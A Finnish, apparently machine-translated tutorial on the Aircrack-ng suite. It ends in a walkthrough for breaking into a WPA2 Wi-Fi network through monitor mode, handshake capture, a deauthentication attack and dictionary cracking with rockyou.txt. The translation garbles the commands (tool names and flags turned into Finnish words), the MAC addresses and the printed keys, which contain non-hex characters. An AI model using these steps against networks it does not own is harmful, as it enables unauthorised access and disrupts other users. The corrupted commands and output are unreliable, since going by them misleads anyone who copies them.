Aircrack-ng: n käyttäminen

How Use Aircrack Ng



Suurimman osan ajasta ihmiset eivät koskaan ajattele verkkoa, johon he ovat yhteydessä. He eivät koskaan ajattele, kuinka turvallinen verkko on ja kuinka paljon he vaarantavat luottamukselliset tietonsa päivittäin. Voit suorittaa haavoittuvuustarkastuksia wifi -verkoissasi käyttämällä erittäin tehokasta työkalua nimeltä Aircrack-ng ja Wireshark. Wiresharkia käytetään verkon toiminnan seuraamiseen. Aircrack-ng on enemmän kuin aggressiivinen työkalu, jonka avulla voit hakata ja antaa pääsyn langattomiin yhteyksiin. Tunkeutujana ajattelu on aina ollut turvallisin tapa suojautua hakkerointia vastaan. Saatat pystyä ymmärtämään tarkat toimet, joita tunkeilija tekee päästäkseen järjestelmään oppimalla aircrackista. Tämän jälkeen voit tehdä vaatimustenmukaisuustarkastuksia omalle järjestelmällesi varmistaaksesi, että järjestelmä ei ole turvaton.

Aircrack-ng on täydellinen ohjelmistosarja, joka on suunniteltu testaamaan WiFi -verkon suojausta. Se ei ole vain yksi työkalu, vaan kokoelma työkaluja, joista jokaisella on tietty tarkoitus. Wifi -suojauksen eri osa -alueita voidaan käsitellä, kuten tukiaseman valvonta, testaus, verkkohyökkäys, wifi -verkon murtaminen ja sen testaaminen. Aircrackin päätavoite on siepata paketit ja tulkita hajautukset salasanojen rikkomiseksi. Se tukee lähes kaikkia uusia langattomia rajapintoja. Aircrack-ng on parannettu versio vanhentuneesta Aircrack -työkalusarjasta, ng viittaa Uusi sukupolvi . Jotkut mahtavista työkaluista, jotka toimivat yhdessä suuremman tehtävän suorittamisessa.







Airmon:

Airmon-ng sisältyy aircrack-ng-sarjaan, joka asettaa verkkokortin näyttötilaan. Verkkokortit hyväksyvät yleensä vain niille kohdistettuja paketteja verkkokortin MAC-osoitteen mukaisesti, mutta airmon-ng: n myötä myös kaikki langattomat paketit, riippumatta siitä, onko ne tarkoitettu heille vai ei. Sinun pitäisi pystyä sieppaamaan nämä paketit linkittämättä tai todentamatta tukiasemaa. Sitä käytetään tukiaseman tilan tarkistamiseen asettamalla verkkoliitäntä näyttötilaan. Ensin on määritettävä langattomat kortit kytkemään näyttötila päälle ja sitten tappaa kaikki taustaprosessit, jos luulet, että jokin prosessi häiritsee sitä. Prosessien päätyttyä monitoritila voidaan ottaa käyttöön langattomassa käyttöliittymässä suorittamalla alla oleva komento:



[sähköposti suojattu]: ~ $sudoairmon-ng start wlan0#

Voit myös poistaa näyttötilan käytöstä pysäyttämällä airmon-ng: n milloin tahansa käyttämällä alla olevaa komentoa:

[sähköposti suojattu]: ~ $sudoairmon-ng stop wlan0#

Ilmansuodatin:

Airodump-ng: tä käytetään luetteloimaan kaikki meitä ympäröivät verkot ja katsomaan niistä arvokasta tietoa. Airodump-ng: n perustoiminnot ovat haistaa paketteja, joten se on olennaisesti ohjelmoitu nappaamaan kaikki ympärillämme olevat paketit monitoritilassa ollessaan. Käytämme sitä kaikkia ympärillämme olevia yhteyksiä vastaan ​​ja keräämme tietoja, kuten verkkoon kytkettyjen asiakkaiden lukumäärän, niitä vastaavat mac -osoitteet, salaustyylin ja kanavien nimet, ja aloitamme sitten kohdeverkkoomme kohdistamisen.

Kirjoittamalla airodump-ng -komennon ja antamalla sille parametrin verkkoliitännän nimen, voimme aktivoida tämän työkalun. Siinä luetellaan kaikki tukiasemat, datapakettien määrä, käytetyt salaus- ja todennusmenetelmät sekä verkon nimi (ESSID). Hakkeroinnin kannalta mac -osoitteet ovat tärkeimpiä kenttiä.

[sähköposti suojattu]: ~ $sudoairodump-ng wlx0mon

Aircrack:

Aircrackia käytetään salasanan murtamiseen. Kun olemme kaapanneet kaikki paketit airodumpilla, voimme murtaa avaimen aircrackilla. Se murtaa nämä avaimet kahdella menetelmällä PTW ja FMS. PTW -lähestymistapa suoritetaan kahdessa vaiheessa. Aluksi käytetään vain ARP -paketteja, ja vasta sitten, jos avain ei ole murtunut haun jälkeen, se käyttää kaikkia muita kaapattuja paketteja. Plussaa PTW -lähestymistavasta on se, että kaikkia paketteja ei käytetä halkeiluun. Toisessa lähestymistavassa, eli FMS: ssä, käytämme sekä tilastollisia malleja että raa'an voiman algosia avaimen murtamiseen. Sanakirjamenetelmää voidaan myös käyttää.

Esitys:

Airplay-ng tuo paketteja langattomaan verkkoon liikenteen luomiseksi tai nopeuttamiseksi. Aireplay-ng voi kaapata paketteja kahdesta eri lähteestä. Ensimmäinen on live -verkko ja toinen paketit jo olemassa olevasta pcap -tiedostosta. Airplay-ng on hyödyllinen langattomaan tukiasemaan ja käyttäjään kohdistuvan autentikointihyökkäyksen aikana. Lisäksi voit suorittaa joitakin hyökkäyksiä, kuten kahvilatte-hyökkäyksen airplay-ng: llä, työkalulla, jonka avulla voit saada avaimen asiakkaan järjestelmästä. Voit saavuttaa tämän pyytämällä ARP -paketin ja käsittelemällä sitä ja lähettämällä sen takaisin järjestelmään. Asiakas luo sitten paketin, jonka airodump voi kaapata, ja aircrack murtaa avaimen kyseisestä muokatusta paketista. Joitakin muita airplay-ng-hyökkäysvaihtoehtoja ovat chopchop, fragment arepreplay jne.

Airbase:

Airbase-ng: tä käytetään tunkeutujan tietokoneen muuttamiseen vaarantuneeksi yhteyspisteeksi, johon muut voivat linkittää. Airbase-ng: n avulla voit väittää olevani laillinen tukiasema ja hyökätä puolivälissä hyökkäyksiin tietokoneeseesi, jotka on liitetty verkkoon. Tällaisia ​​hyökkäyksiä kutsutaan Evil Twin Attacksiksi. Peruskäyttäjien on mahdotonta erottaa laillisen ja väärennetyn tukiaseman välillä. Joten, paha kaksoisuhka on yksi uhkaavimmista langattomista uhista, joita kohtaamme tänään.

Airolib-ng:

Airolib nopeuttaa hakkerointiprosessia tallentamalla ja hallinnoimalla salasanaluetteloita ja tukiasemaa. Tämän ohjelman käyttämä tietokannanhallintajärjestelmä on SQLite3, joka on enimmäkseen saatavilla kaikilla alustoilla. Salasanan säröily sisältää parillisen pääavaimen laskennan, jonka kautta yksityinen ohimenevä avain (PTK) puretaan. PTK: n avulla voit määrittää kehysviestin tunnistuskoodin (MIC) tietylle paketille ja teoriassa löytää MIC: n olevan samanlainen kuin paketti, joten jos PTK oli oikeassa, myös PMK oli oikeassa.

Näet tietokantaan tallennetut salasanaluettelot ja pääsyverkot kirjoittamalla seuraavan komennon:

[sähköposti suojattu]: ~ $sudoairolib-ng testdatabase –tilastot

Tässä testitietokanta on db, jota haluat käyttää tai luoda, ja –stats on toiminto, jonka haluat suorittaa sille. Voit tehdä useita toimintoja tietokannan kentillä, kuten antaa etusijalle jollekin SSID: lle tai jotain. Jos haluat käyttää airolib-ng: tä aircrack-ng: n kanssa, kirjoita seuraava komento:

[sähköposti suojattu]: ~ $sudoaircrack-ng-rtestdatabase wpa2.eapol.cap

Tässä käytämme jo laskettuja PMK -tiedostoja, jotka on tallennettu testitietokanta nopeuttaaksesi salasanan murtamisprosessia.

WPA/WPA2: n halkeilu Aircrack-ng: llä:

Katsotaanpa pieni esimerkki siitä, mitä aircrack-ng voi tehdä muutamien sen mahtavien työkalujen avulla. Me murtamme WPA/WPA2-verkon esijaetun avaimen sanakirjamenetelmän avulla.

Ensimmäinen asia, joka meidän on tehtävä, on luetella verkkoliitännät, jotka tukevat näyttötilaa. Tämä voidaan tehdä käyttämällä seuraavaa komentoa:

[sähköposti suojattu]: ~ $sudoairmon-ng

PHY -liitäntäohjaimen piirisarja

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Voimme nähdä käyttöliittymän; Nyt meidän on asetettava löydetty verkkoliitäntä (wlx0) monitoritilaan käyttämällä seuraavaa komentoa:

[sähköposti suojattu]: ~ $sudoairmon-ng start wlx0

Se on ottanut käyttöön monitoritilan ns wlx0mon .

Nyt meidän pitäisi alkaa kuunnella läheisten reitittimien lähetyksiä monitoritilaan asettamamme verkkoliitännän kautta.

[sähköposti suojattu]: ~ $sudoairodump-ng wlx0mon

CH5 ][Kulunut:30s][ 2020-12-02 00:17



BSSID PWR -majakat#Data, #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Neljä viisi 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10:OLLA-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: ANTAA:88:FA:38: 02-68 28 2 0 yksitoista54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:315C: 3A:Neljä viisi: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e-6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31EKr.91: B5: F8: 7E: D5 -390e-1 1002 13

Kohdeverkostomme on Hullu tässä tapauksessa, joka on parhaillaan käynnissä kanavalla 1.

Tässä kohdeverkoston salasanan murtamiseksi meidän on kaapattava nelisuuntainen kättely, joka tapahtuu, kun laite yrittää muodostaa yhteyden verkkoon. Voimme kaapata sen käyttämällä seuraavaa komentoa:

[sähköposti suojattu]: ~ $sudoilmalämpöpumppu-c 1--bssid E4: 6F:13: 04: CE:31 -sisään /koti wlx0

-c : Kanava

- Bss : Kohdeverkon Bssid

-sisään : Sen hakemiston nimi, johon pcap -tiedosto sijoitetaan

Nyt meidän on odotettava, että laite muodostaa yhteyden verkkoon, mutta on parempi tapa kaapata kättely. Voimme poistaa laitteiden todennuksen tukiasemalle käyttämällä deauthentication -hyökkäystä seuraavan komennon avulla:

[sähköposti suojattu]: ~ $sudolentoliikenne-0 -kohteeseenE4: 6F:13: 04: CE:31

kohteeseen : Kohdeverkon Bssid

-0 : deauthentication hyökkäys

Olemme irrottaneet kaikki laitteet, ja nyt meidän on odotettava, että laite muodostaa yhteyden verkkoon.

CH1 ][Kulunut:30s][ 2020-12-02 00:02][WPA -kättely: E4: 6F:13: 04: CE:31



BSSID PWR RXQ -majakat#Data, #/s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154. WPA2 CCMP PSK P.



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:31EKr.91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:Neljä viisi: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e-6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Saimme osuman, ja katsomalla oikean yläkulman heti ajan vieressä voimme nähdä, että kättely on otettu. Katso nyt määritettyä kansiota ( /Koti meidän tapauksessamme) a .pcap tiedosto.

WPA -avaimen murtamiseksi voimme käyttää seuraavaa komentoa:

[sähköposti suojattu]: ~ $sudoaircrack-ng-2 -sisäänrockyou.txt-bE4: 6F:13: 04: CE:31kädenpuristus. korkki

b: Kohdeverkon Bssid

-a2: WPA2 -tila

Rockyou.txt: Sanakirjatiedostokäytetty

Kädenpuristus. Korkki:tiedosto jokasisältää otetun kädenpuristuksen

Aircrack-ng1.2beta3

[00:01:49] 10566avaimet testattu(1017,96kohteeseen/s)

AVAIN! [teit]

Pääavain: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FviisikymmentäC


Väliaikainen avain: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FviisikymmentäC025 62E9 5D71

Kohdeverkkoomme avain on murtautunut onnistuneesti.

Johtopäätös:

Langattomia verkkoja on kaikkialla, ja niitä käyttävät kaikki yritykset älypuhelimia käyttävistä työntekijöistä teollisiin ohjauslaitteisiin. Tutkimusten mukaan lähes 20 prosenttia Internet -liikenteestä tulee WiFi -yhteydelle vuonna 2021. Langattomilla verkoilla on monia etuja, viestintä ulko -ovien kanssa, nopea Internet -yhteys paikoissa, joissa johtojen asettaminen on lähes mahdotonta, voivat laajentaa verkkoa asentamatta kaapeleita muille käyttäjille ja voi helposti yhdistää mobiililaitteesi kotitoimistoosi, kun et ole siellä.

Näistä eduista huolimatta yksityisyydestäsi ja turvallisuudestasi tulee suuri kysymysmerkki. Kuten nämä verkot; Lähetysalueella olevat reitittimet ovat kaikille avoimia, niihin voidaan helposti hyökätä ja tietosi voivat vaarantua. Jos esimerkiksi olet yhteydessä johonkin julkiseen wifi -verkkoon, kaikki tähän verkkoon yhdistetyt voivat helposti tarkistaa verkkoliikenteesi käyttämällä älykkyyttä ja käytettävissä olevien mahtavien työkalujen avulla ja jopa tyhjentää sen.